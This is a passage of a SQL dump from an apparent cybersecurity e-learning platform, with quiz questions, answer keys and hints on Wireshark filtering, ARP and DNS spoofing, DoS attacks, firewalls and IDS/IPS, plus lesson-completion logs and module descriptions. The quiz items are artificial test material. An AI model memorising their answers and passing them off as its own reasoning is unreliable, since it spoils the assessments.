(7252, 819, 'If an analyst wants to view all traffic for IP 192.168.1.5 that is NOT DNS traffic, which filter should they use?', 3, 'ip.addr == 192.168.1.5 && !(dns)', 0, 'Combine AND with NOT.', '2026-03-09 22:28:55', '[\"ip.addr = 192.168.1.5 AND NOT dns\",\"ip.addr == 192.168.1.5 && dns == 0\",\"ip.addr == 192.168.1.5 || !(dns)\",\"ip.addr == 192.168.1.5 && !(dns)\"]'),
(7253, 819, 'Which operator allows you to search for a specific, literal text string within the payload of a packet, such as `http _______ \"login\"`?', 4, 'contains', 0, 'It checks if the payload contains the string.', '2026-03-09 22:28:55', '[\"contains\",\"matches\",\"has\",\"includes\"]'),
(7254, 819, 'To show traffic targeting either the standard HTTP port OR the standard HTTPS port, which filter is correct?', 5, 'tcp.port == 80 || tcp.port == 443', 0, 'Use the boolean OR operator.', '2026-03-09 22:28:55', '[\"tcp.port == 80 && tcp.port == 443\",\"http || https\",\"tcp.port == 80 || tcp.port == 443\",\"tcp.ports = 80, 443\"]'),
(7255, 820, 'When you \"Follow TCP Stream\" in Wireshark, what does the software essentially do?', 1, 'Reassembles fragmented packets in order and strips away networking headers to show the raw application data', 0, 'It pieces the conversation back together.', '2026-03-09 22:28:55', '[\"Runs a malware scan on the packets\",\"Deletes all packets that are not part of the stream\",\"Decrypts all HTTPS traffic automatically\",\"Reassembles fragmented packets in order and strips away networking headers to show the raw application data\"]'),
(7256, 820, 'When viewing a followed TCP Stream window, what does the RED colored text signify?', 2, 'Data sent from the Client to the Server', 0, 'Red is client requests.', '2026-03-09 22:28:55', '[\"Data sent from the Server to the Client\",\"Data that failed a checksum\",\"Data that triggered an IDS alert\",\"Data sent from the Client to the Server\"]'),
(7257, 820, 'If you try to \"Follow TCP Stream\" on an SSH connection (Port 22), what will you see in the stream window?', 3, 'Random, unreadable gibberish characters', 0, 'SSH is fully encrypted.', '2026-03-09 22:28:55', '[\"The bash history of the user\",\"The username and password in plaintext\",\"A list of files on the server\",\"Random, unreadable gibberish characters\"]'),
(7258, 820, 'Which menu path allows you to quickly carve and rebuild a downloaded executable file out of an unencrypted web browsing session?', 4, 'File -> Export Objects -> HTTP', 0, 'Exporting HTTP objects.', '2026-03-09 22:28:55', '[\"File -> Export Objects -> HTTP\",\"Edit -> Find Packet -> Executable\",\"Statistics -> Protocol Hierarchy\",\"Analyze -> Decode As -> File\"]'),
(7259, 820, 'When exporting HTTP objects, what information does Wireshark use to try and determine what type of file it is (e.g., telling you it is `application/x-msdownload`)?', 5, 'The Content-Type HTTP header field', 0, 'The server tells the client what type of content it is.', '2026-03-09 22:28:55', '[\"The file extension in the URL\",\"The TCP Sequence Number\",\"The MAC address of the server\",\"The Content-Type HTTP header field\"]'),
(7260, 821, 'What fundamental flaw in the Address Resolution Protocol allows ARP spoofing to occur?', 1, 'Devices blindly accept and cache unsolicited ARP replies without any verification', 0, 'ARP is overly trusting.', '2026-03-09 22:28:55', '[\"ARP relies on UDP which does not guarantee delivery\",\"ARP broadcasts are dropped by modern network switches\",\"ARP packets are encrypted using a weak algorithm\",\"Devices blindly accept and cache unsolicited ARP replies without any verification\"]'),
(7261, 821, 'In an ARP spoofing attack, what specific hardware identifier is the attacker attempting to associate with a legitimate IP address?', 2, 'Their own MAC address', 0, 'Layer 2 is all about MAC addresses.', '2026-03-09 22:28:55', '[\"The default gateway\'s public IP address\",\"The switch\'s port number\",\"Their own MAC address\",\"A randomly generated IPv6 address\"]'),
(7262, 821, 'When an attacker successfully poisons the ARP cache of a victim and a router, putting themselves in the middle of the communication, what type of attack is this?', 3, 'Man-in-the-Middle (MITM)', 0, 'The attacker is literally standing in the middle.', '2026-03-09 22:28:55', '[\"Denial of Service (DoS)\",\"Cross-Site Scripting (XSS)\",\"Man-in-the-Middle (MITM)\",\"SQL Injection\"]'),
(7263, 821, 'Can an attacker on the public internet (e.g., in another country) perform an ARP spoofing attack against your home computer?', 4, 'No, ARP operates at Layer 2 and MAC broadcasts do not cross routers into the internet', 0, 'ARP is strictly local.', '2026-03-09 22:28:55', '[\"Yes, if they know your public IP address\",\"Yes, if they send enough ARP replies to overwhelm your router\",\"No, ARP operates at Layer 2 and MAC broadcasts do not cross routers into the internet\",\"No, because modern ISPs block all ARP traffic globally\"]'),
(7264, 821, 'If an attacker achieves a MITM position via ARP spoofing and decides to simply drop every packet the victim sends, effectively cutting off their internet access, what is this specific outcome called?', 5, 'A Blackhole or Denial of Service attack', 0, 'Traffic goes in but never comes out.', '2026-03-09 22:28:55', '[\"A Blackhole or Denial of Service attack\",\"A DNS Amplification attack\",\"A Smurf attack\",\"A Replay attack\"]'),
(7265, 822, 'In a local DNS Spoofing attack, what must the attacker typically accomplish first in order to intercept the victim\'s DNS queries?', 1, 'Establish a Man-in-the-Middle (MITM) position, usually via ARP Spoofing', 0, 'You need to be in the path of the traffic first.', '2026-03-09 22:28:55', '[\"Perform a Distributed Denial of Service (DDoS)\",\"Establish a Man-in-the-Middle (MITM) position, usually via ARP Spoofing\",\"Hack the corporate firewall\",\"Guess the victim\'s password\"]'),
(7266, 822, 'What is the primary goal of a malicious actor performing DNS Spoofing against a user navigating to their online bank?', 2, 'To redirect the user to a fake clone of the bank website to steal their login credentials', 0, 'Phishing via technical redirection.', '2026-03-09 22:28:55', '[\"To make the bank website load faster\",\"To redirect the user to a fake clone of the bank website to steal their login credentials\",\"To encrypt the user\'s hard drive for ransom\",\"To permanently delete the bank\'s DNS records\"]'),
(7267, 822, 'How does DNS Cache Poisoning differ from local DNS Spoofing?', 3, 'Cache poisoning targets the DNS Server itself, affecting all users of that server, rather than a single local victim', 0, 'Mass scale vs targeted scale.', '2026-03-09 22:28:55', '[\"Cache poisoning only works on IPv6 networks\",\"Cache poisoning targets the DNS Server itself, affecting all users of that server, rather than a single local victim\",\"Cache poisoning replaces the MAC address instead of the IP address\",\"There is no difference; they are synonymous terms\"]'),
(7268, 822, 'Which security technology provides cryptographic digital signatures to verify that the IP address in a DNS reply actually came from the true owner of the domain?', 4, 'DNSSEC', 0, 'DNS Security Extensions.', '2026-03-09 22:28:55', '[\"DNSSEC\",\"WPA3\",\"HTTPS\",\"VPN\"]'),
(7269, 822, 'What protocol encrypts DNS queries to prevent local attackers (like someone sniffing traffic at a coffee shop) from seeing or modifying which websites you are trying to visit?', 5, 'DoH (DNS over HTTPS)', 0, 'Hiding DNS inside encrypted web traffic.', '2026-03-09 22:28:55', '[\"DoH (DNS over HTTPS)\",\"FTP\",\"DHCP\",\"ICMP\"]'),
(7270, 823, 'In a TCP SYN Flood attack, which step of the 3-Way Handshake does the attacker intentionally fail to complete in order to consume server resources?', 1, 'The final ACK', 0, 'Leaving connections half-open.', '2026-03-09 22:28:55', '[\"The SYN-ACK response\",\"The final ACK\",\"The initial SYN\",\"The FIN packet\"]'),
(7271, 823, 'What is the primary characteristic of an \"Amplification\" or \"Reflection\" DoS attack?', 2, 'Sending a small spoofed request that results in a much larger response directed at the victim', 0, 'It acts as a force multiplier for the attacker.', '2026-03-09 22:28:55', '[\"Sending a small spoofed request that results in a much larger response directed at the victim\",\"Guessing the administrator\'s password millions of times per minute\",\"Encrypting the server\'s hard drive to prevent access\",\"Exploiting a buffer overflow in the web application code\"]'),
(7272, 823, 'Why do Amplification attacks almost exclusively rely on UDP protocols like DNS or NTP, rather than TCP?', 3, 'UDP is connectionless and stateless, making it easy to spoof the source IP address', 0, 'TCP\'s handshake prevents spoofed source IPs from establishing connections.', '2026-03-09 22:28:55', '[\"UDP packets are naturally larger than TCP packets\",\"TCP is immune to all forms of Denial of Service\",\"UDP is heavily encrypted making it harder to track\",\"UDP is connectionless and stateless, making it easy to spoof the source IP address\"]'),
(7273, 823, 'In a historic \"Smurf Attack\", what protocol does the attacker abuse by sending packets to a broadcast address with a spoofed source IP?', 4, 'ICMP (Ping)', 0, 'It uses Echo Requests and Replies.', '2026-03-09 22:28:55', '[\"DHCP\",\"HTTP\",\"SMTP\",\"ICMP (Ping)\"]'),
(7274, 823, 'What distinguishes a DDoS attack from a standard DoS attack?', 5, 'DDoS utilizes multiple compromised systems (a botnet) to launch the attack simultaneously', 0, 'Distributed means coming from many places at once.', '2026-03-09 22:28:55', '[\"DDoS attacks steal data, whereas DoS attacks only disrupt service\",\"DDoS relies on physical destruction of servers\",\"DDoS only targets government networks\",\"DDoS utilizes multiple compromised systems (a botnet) to launch the attack simultaneously\"]'),
(7275, 824, 'Which type of firewall looks at every single packet individually and has no memory of the overall connection or \"session\"?', 1, 'Stateless Packet-Filtering Firewall', 0, 'It lacks state awareness.', '2026-03-09 22:28:55', '[\"Web Application Firewall (WAF)\",\"Next-Generation Firewall (NGFW)\",\"Stateful Inspection Firewall\",\"Stateless Packet-Filtering Firewall\"]'),
(7276, 824, 'If an internal employee initiates an outbound connection to a web server, what feature allows a modern firewall to automatically permit the returning inbound web traffic without requiring a specific inbound \"allow\" rule?', 2, 'Stateful Inspection', 0, 'Tracking the state of the connection.', '2026-03-09 22:28:55', '[\"Deep Packet Inspection\",\"SSL Decryption\",\"Stateful Inspection\",\"Stateless Filtering\"]'),
(7277, 824, 'Next-Generation Firewalls (NGFWs) operate up to which layer of the OSI model, allowing them to understand specific applications like \"Facebook\" or \"BitTorrent\" rather than just \"Port 443\"?', 3, 'Layer 7 (Application Layer)', 0, 'The highest layer for application awareness.', '2026-03-09 22:28:55', '[\"Layer 3 (Network Layer)\",\"Layer 4 (Transport Layer)\",\"Layer 7 (Application Layer)\",\"Layer 5 (Session Layer)\"]'),
(7278, 824, 'What is the fundamental security principle that dictates a firewall should block all traffic unless a specific rule has been created to explicitly allow it?', 4, 'Implicit Deny / Default Deny', 0, 'Assume everything is bad until proven good.', '2026-03-09 22:28:55', '[\"Implicit Allow\",\"Default Reject\",\"Least Privilege Routing\",\"Implicit Deny / Default Deny\"]'),
(7279, 824, 'When a firewall blocks traffic coming from the public internet, which action is generally preferred because it silently discards the packet without giving the attacker any feedback or confirmation that the IP address is active?', 5, 'Drop (or Deny)', 0, 'Silence is golden when dealing with scanners.', '2026-03-09 22:28:55', '[\"Reject\",\"Drop (or Deny)\",\"Proxy\",\"Forward\"]'),
(7280, 825, 'Which system operates passively by analyzing a copy of network traffic (out-of-band) and only generates alerts without blocking the traffic?', 1, 'IDS (Intrusion Detection System)', 0, 'It detects, but does not prevent.', '2026-03-09 22:28:55', '[\"WAF (Web Application Firewall)\",\"NGFW (Next-Generation Firewall)\",\"IPS (Intrusion Prevention System)\",\"IDS (Intrusion Detection System)\"]'),
(7281, 825, 'Because an Intrusion Prevention System (IPS) sits \"in-line\" with network traffic, what is the most significant operational risk if it is misconfigured?', 2, 'It might accidentally drop legitimate business traffic (a False Positive block)', 0, 'Active inline blocking carries the risk of business disruption.', '2026-03-09 22:28:55', '[\"It cannot detect encrypted traffic at all\",\"It will slow down the network by copying traffic to a span port\",\"It might accidentally drop legitimate business traffic (a False Positive block)\",\"It will automatically grant administrator rights to external IP addresses\"]'),
(7282, 825, 'If a brand new, never-before-seen exploit (a Zero-Day) is launched against a network, which detection method is completely blind to it because it relies on known technical indicators?', 3, 'Signature-Based Detection', 0, 'Signatures only work for known past threats.', '2026-03-09 22:28:55', '[\"Anomaly-Based Detection\",\"Signature-Based Detection\",\"Heuristic Detection\",\"Behavioral Analysis\"]'),
(7283, 825, 'Which detection method creates a statistical baseline of \"normal\" traffic and alerts when deviations occur, such as an unusual spike in outbound data transfer at 3 AM?', 4, 'Anomaly/Behavior-Based Detection', 0, 'It looks for weird behavior, not specific bad code.', '2026-03-09 22:28:55', '[\"Anomaly/Behavior-Based Detection\",\"Signature-Based Detection\",\"Stateful Inspection\",\"Packet Filtering\"]'),
(7284, 825, 'If an organization values \"never accidentally dropping a legitimate customer transaction\" over \"stopping 100% of attacks automatically\", which deployment model should they choose?', 5, 'Deploy an IDS on a span port', 0, 'IDS cannot affect live traffic routing.', '2026-03-09 22:28:55', '[\"Deploy an IDS on a span port\",\"Deploy an IPS in-line\",\"Disable all security controls\",\"Deploy a stateless firewall\"]');

-- --------------------------------------------------------

--
-- Table structure for table `mobile_lesson_completions`
--

CREATE TABLE `mobile_lesson_completions` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `lesson_id` int(11) NOT NULL,
  `xp_earned` int(11) DEFAULT 0,
  `completed_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `mobile_lesson_completions`
--

INSERT INTO `mobile_lesson_completions` (`id`, `user_id`, `lesson_id`, `xp_earned`, `completed_at`) VALUES
(1, 34, 471, 25, '2026-01-12 03:27:48'),
(2, 34, 469, 25, '2026-01-12 03:27:55'),
(3, 34, 4, 15, '2026-01-12 13:16:39'),
(4, 76, 470, 25, '2026-01-13 00:47:15'),
(5, 34, 471, 25, '2026-01-13 02:18:10'),
(6, 34, 6, 15, '2026-01-13 02:18:16'),
(7, 34, 3, 15, '2026-01-13 02:18:18'),
(8, 34, 9, 15, '2026-01-13 02:18:21'),
(9, 34, 7, 15, '2026-01-13 02:18:24'),
(10, 80, 6, 15, '2026-01-15 23:43:36'),
(11, 80, 9, 15, '2026-01-15 23:43:39'),
(12, 80, 11, 15, '2026-01-15 23:43:42'),
(13, 80, 449, 25, '2026-01-15 23:43:45'),
(14, 80, 5, 15, '2026-01-15 23:43:48'),
(15, 79, 449, 25, '2026-01-16 04:04:19'),
(16, 79, 5, 15, '2026-01-16 04:05:25'),
(17, 79, 11, 15, '2026-01-16 04:05:50'),
(18, 79, 9, 15, '2026-01-16 04:06:01'),
(19, 79, 6, 15, '2026-01-16 04:06:07'),
(20, 79, 8, 15, '2026-01-24 12:38:58'),
(21, 102, 8, 15, '2026-01-30 02:11:32'),
(22, 78, 8, 15, '2026-02-13 18:59:13'),
(23, 78, 450, 25, '2026-02-13 18:59:17'),
(24, 78, 472, 25, '2026-02-13 18:59:19'),
(25, 78, 468, 25, '2026-02-13 18:59:21'),
(26, 78, 10, 15, '2026-02-13 18:59:23'),
(27, 151, 6, 15, '2026-02-14 19:17:47'),
(28, 148, 447, 25, '2026-02-15 04:24:48'),
(29, 99, 12, 15, '2026-02-15 04:53:34'),
(30, 109, 1, 15, '2026-02-15 08:32:51'),
(31, 156, 469, 25, '2026-02-15 20:45:59'),
(32, 161, 6, 15, '2026-02-16 05:01:04'),
(33, 99, 7, 15, '2026-02-16 17:15:25'),
(34, 165, 12, 15, '2026-02-16 17:19:30'),
(35, 147, 447, 25, '2026-02-16 21:28:45'),
(36, 165, 7, 15, '2026-02-17 05:26:10'),
(37, 109, 12, 15, '2026-02-17 21:11:39'),
(38, 78, 1, 15, '2026-02-18 02:25:57'),
(39, 170, 1, 15, '2026-02-18 08:21:32'),
(40, 99, 451, 25, '2026-02-18 09:14:58'),
(41, 177, 451, 25, '2026-02-19 04:07:06'),
(42, 78, 8, 15, '2026-02-19 08:27:09'),
(43, 99, 472, 25, '2026-02-19 15:20:47'),
(44, 180, 472, 25, '2026-02-19 15:46:21'),
(45, 109, 471, 25, '2026-02-19 16:01:40'),
(46, 34, 12, 15, '2026-02-20 02:54:34'),
(47, 187, 1, 15, '2026-02-21 03:10:08'),
(48, 182, 7, 15, '2026-02-22 02:45:48'),
(49, 177, 472, 25, '2026-02-22 08:47:47'),
(50, 194, 12, 15, '2026-02-23 03:21:52'),
(51, 177, 1, 15, '2026-02-23 10:55:33'),
(52, 180, 469, 25, '2026-02-23 11:33:24'),
(53, 99, 10, 15, '2026-02-23 15:35:39'),
(54, 196, 3, 15, '2026-02-23 17:47:38'),
(55, 177, 7, 15, '2026-02-24 11:44:14'),
(56, 99, 470, 25, '2026-02-24 13:33:45'),
(57, 147, 469, 25, '2026-02-24 17:11:26'),
(58, 202, 8, 15, '2026-02-24 18:59:18'),
(59, 203, 471, 25, '2026-02-24 19:48:18'),
(60, 165, 449, 25, '2026-02-24 19:53:49'),
(61, 177, 449, 25, '2026-02-25 12:08:00'),
(62, 99, 1, 15, '2026-02-25 16:16:02'),
(63, 174, 1, 15, '2026-02-26 05:00:25'),
(64, 109, 448, 25, '2026-02-26 05:38:01'),
(65, 195, 3, 15, '2026-02-26 07:44:44'),
(66, 99, 11, 15, '2026-02-26 15:09:23'),
(67, 210, 1, 15, '2026-02-26 21:10:14'),
(68, 209, 1, 15, '2026-02-27 04:03:26'),
(69, 99, 12, 15, '2026-02-27 15:41:32'),
(71, 179, 1, 15, '2026-03-01 18:40:25'),
(72, 177, 469, 25, '2026-03-01 21:51:58'),
(73, 109, 469, 25, '2026-03-01 23:02:01'),
(74, 177, 1, 15, '2026-03-03 08:35:45'),
(75, 234, 447, 25, '2026-03-03 19:47:00'),
(76, 237, 470, 25, '2026-03-04 00:44:59'),
(78, 229, 451, 25, '2026-03-04 10:39:27'),
(79, 238, 11, 15, '2026-03-04 15:24:05'),
(80, 220, 7, 15, '2026-03-05 06:42:05'),
(82, 109, 472, 25, '2026-03-06 05:15:36'),
(83, 229, 449, 25, '2026-03-06 20:54:06'),
(84, 259, 5, 15, '2026-03-06 21:49:59'),
(85, 177, 10, 15, '2026-03-07 19:10:20'),
(86, 177, 8, 15, '2026-03-08 11:22:07'),
(87, 109, 12, 15, '2026-03-08 12:48:39'),
(89, 264, 11, 15, '2026-03-09 09:48:04'),
(90, 266, 6, 15, '2026-03-09 12:22:07'),
(91, 195, 449, 25, '2026-03-09 20:58:17'),
(92, 273, 6, 15, '2026-03-10 13:59:07'),
(93, 266, 1, 15, '2026-03-10 14:33:19'),
(94, 274, 3, 15, '2026-03-10 21:03:08'),
(95, 229, 1, 15, '2026-03-11 01:35:29'),
(96, 78, 470, 25, '2026-03-11 07:48:14'),
(97, 275, 3, 15, '2026-03-11 10:53:17'),
(98, 195, 7, 15, '2026-03-11 12:05:45'),
(99, 285, 8, 15, '2026-03-12 07:40:14'),
(100, 288, 469, 25, '2026-03-12 10:23:54'),
(101, 290, 1011, 25, '2026-03-12 14:11:40'),
(102, 293, 449, 25, '2026-03-13 11:14:37'),
(103, 288, 448, 25, '2026-03-13 12:22:26'),
(104, 180, 1027, 25, '2026-03-13 18:04:25'),
(105, 266, 3, 15, '2026-03-14 02:17:15'),
(106, 294, 1, 15, '2026-03-14 04:15:23'),
(107, 295, 1006, 25, '2026-03-14 06:28:16'),
(108, 99, 472, 25, '2026-03-14 07:28:02'),
(109, 299, 470, 25, '2026-03-14 21:43:38'),
(110, 177, 1, 15, '2026-03-15 04:30:01'),
(111, 78, 1027, 25, '2026-03-15 05:51:51'),
(112, 78, 12, 15, '2026-03-15 05:52:03'),
(113, 78, 5, 15, '2026-03-15 05:52:05'),
(114, 78, 451, 25, '2026-03-15 05:52:06'),
(115, 266, 449, 25, '2026-03-15 14:35:10'),
(116, 99, 468, 25, '2026-03-15 17:43:57');

-- --------------------------------------------------------

--
-- Table structure for table `modules`
--

CREATE TABLE `modules` (
  `id` int(11) NOT NULL,
  `learning_path_id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `estimated_hours` int(11) DEFAULT 0,
  `display_order` int(11) DEFAULT 0,
  `prerequisite_module_id` int(11) DEFAULT NULL,
  `is_active` tinyint(1) DEFAULT 1,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `modules`
--

INSERT INTO `modules` (`id`, `learning_path_id`, `title`, `description`, `estimated_hours`, `display_order`, `prerequisite_module_id`, `is_active`, `created_at`, `updated_at`) VALUES
(1, 1, 'Introduction to Cybersecurity', 'Learn what cybersecurity is, why it matters, and explore career paths in the field.', 15, 1, NULL, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
(2, 1, 'Linux Fundamentals', 'Master the Linux command line, file permissions, and basic system administration.', 25, 2, NULL, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
(4, 1, 'Networking Essentials', 'Learn the OSI model, TCP/IP, subnetting, and common network protocols.', 30, 4, NULL, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
(9, 1, 'Windows Fundamentals', 'Master Windows OS, Active Directory basics, and PowerShell for security operations.', 16, 3, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 03:05:08'),
(10, 1, 'Security Principles', 'Core security concepts: CIA Triad, AAA, encryption, defense in depth.', 14, 5, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 03:05:08'),
(11, 1, 'Windows Command Line', 'Master essential Windows commands: Navigation, Files, Networking, and Processes.', 5, 6, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12'),
(12, 2, 'Log Analysis Fundamentals', 'Master the art of reading logs, from basic authentication to advanced attack detection.', 8, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58'),
(14, 2, 'Web Proxies Fundamentals', 'Understand how proxies work, how to intercept traffic, and the basics of Burp Suite.', 5, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42'),
(15, 2, 'Introduction to IDS/IPS', 'Comprehensive guide to Intrusion Detection and Prevention Systems.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:20'),
(16, 2, 'Vulnerability Scanning', 'Master the Vulnerability Management Lifecycle.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21'),
(17, 2, 'Web App Scanning (DAST)', 'Dynamic Application Security Testing deep dive.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21'),
(18, 2, 'Introduction to OSINT', 'Master Open Source Intelligence gathering techniques and tools.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:25:25'),
(19, 2, 'Phishing & Email Analysis', 'Learn to dissect email headers and investigate phishing attacks.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:25:25'),
(20, 2, 'Social Engineering Defense', 'Understand the human element of security and how to defend against manipulation.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:28:54'),
(21, 2, 'Virtualization & Lab Setup', 'Build your own safe hacking laboratory using Virtual Machines.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:32:26'),
(22, 3, 'SIEM Fundamentals', 'Master the \"Brain\" of the SOC: Security Information and Event Management.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:35:58'),
(23, 3, 'SIEM Use Cases', 'Practical log analysis scenarios ranging from Easy to Data Exfiltration.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:41:26'),
(24, 3, 'EDR Concepts', 'Master Endpoint Detection & Response: Telemetry, Process Trees, and Threat Hunting.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:47:08'),
(25, 3, 'Intrusion Detection', 'Learn to identify and investigate network and host-based intrusions.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:50:58'),
(26, 3, 'Malware Analysis Basics', 'Learn to safely analyze malware: Static, Dynamic, and Behavioral techniques.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:55:56'),
(27, 3, 'Incident Response Framework', 'Master the structured approach to handling security incidents.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(28, 3, 'Digital Forensics Intro', 'Learn the fundamentals of collecting and analyzing digital evidence.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(29, 3, 'Network Traffic Analysis', 'Learn to capture and analyze network packets for threat detection.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(30, 3, 'Threat Hunting Basics', 'Proactively search for threats before they cause damage.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(31, 3, 'MITRE ATT&CK Framework', 'Understand the knowledge base of adversary tactics and techniques.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(32, 3, 'Cloud Security Basics', 'Understand security challenges and controls in cloud environments.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(33, 3, 'Security Automation', 'Learn to automate security tasks using SOAR and scripting.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(34, 3, 'Reporting & Documentation', 'Master the art of documenting investigations and writing reports.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(36, 4, 'Advanced SIEM', 'Deep dive into SIEM engineering: Query optimization, custom parsers, and correlation logic.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:16:31'),
(37, 4, 'Memory Forensics', 'Analyze volatile memory to uncover malware, rootkits, and attacker artifacts.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:18:03'),
(38, 4, 'Malware Reverse Engineering', 'Disassemble and analyze malicious code to understand its behavior.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:19:34'),
(39, 4, 'Advanced Threat Intelligence', 'Operationalize threat intel: Collection, analysis, dissemination, and integration.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:21:00'),
(40, 4, 'Red vs Blue Team Dynamics', 'Purple teaming: Collaboration between offensive and defensive security.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:22:23'),
(41, 4, 'Purple Teaming Exercises', 'Hands-on exercises combining offensive execution with defensive detection.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:26:00'),
(42, 4, 'Container Security', 'Secure Docker, Kubernetes, and container orchestration environments.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:27:22'),
(43, 4, 'Zero Trust Architecture', 'Never trust, always verify: Implementing zero trust principles.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:28:42'),
(44, 4, 'Compliance & Frameworks', 'Navigate security compliance: NIST, ISO, SOC 2, PCI-DSS, and HIPAA.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:30:07'),
(49, 9, 'EDR Investigations', 'Learn about EDR Investigations', 0, 1, NULL, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30'),
(51, 9, 'SIEM Log Analysis', 'Learn about SIEM Log Analysis', 0, 3, NULL, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30'),
(52, 9, 'Email Security & Phishing', 'Learn about Email Security & Phishing', 0, 4, NULL, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31'),
(53, 9, 'Vulnerability Management', 'Learn about Vulnerability Management', 0, 5, NULL, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31'),
(117, 6, 'CTI Fundamentals', 'Foundations of Cyber Threat Intelligence: The Intelligence Cycle, Types of Intel, and Pyramid of Value.', 3, 1, NULL, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44'),
(118, 6, 'OSINT Techniques', 'Open Source Intelligence: Gathering data from public sources using passive reconnaissance.', 4, 2, NULL, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45'),
(119, 6, 'Malware Analysis', 'Understand malware behavior, static vs dynamic analysis, and sandboxing.', 4, 3, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(120, 6, 'Indicators & Standards', 'IOCs, IOAs, TLP, and STIX/TAXII standards.', 3, 4, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(121, 6, 'MITRE ATT&CK', 'Master the framework.', 4, 5, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(122, 6, 'Threat Hunting', 'Proactive search for threats. Stacking, Clustering, and Hypothesis driven hunting.', 4, 6, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(123, 6, 'Intelligence Platforms', 'Using MISP and OpenCTI.', 5, 7, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(124, 6, 'Reporting & Dissemination', 'Writing effective reports for different audiences.', 2, 8, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(125, 11, 'Module 1: Introduction to DFIR', 'Understand the core concepts of Digital Forensics and the Incident Response lifecycle.', 0, 1, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(126, 11, 'Module 2: Evidence Acquisition & Handling', 'Learn how to properly secure, collect, and preserve digital evidence without destroying it.', 0, 2, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(127, 11, 'Module 3: Windows Forensics', 'Dive deep into the Windows Operating System to uncover attacker activity using the Registry, Event Logs, and system artifacts.', 0, 3, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(128, 11, 'Module 4: Memory Forensics (Volatility)', 'Learn how to extract hidden malware, running processes, and network connections from a captured RAM image.', 0, 4, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(129, 11, 'Module 5: Network Forensics (PCAP Analysis)', 'Learn how to analyze packet captures (PCAPs) using Wireshark and Tshark to trace attacker movements and extract stolen data.', 0, 5, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(130, 11, 'Module 6: Incident Response Methodology (PICERL)', 'Learn the standard active response framework used by defense teams to combat live attackers on the network.', 0, 6, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(131, 12, 'Module 1: TCP/IP & Protocols', 'Understand how computers communicate globally. Learn the OSI model, TCP/IP suite, and fundamental networking concepts.', 0, 1, NULL, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
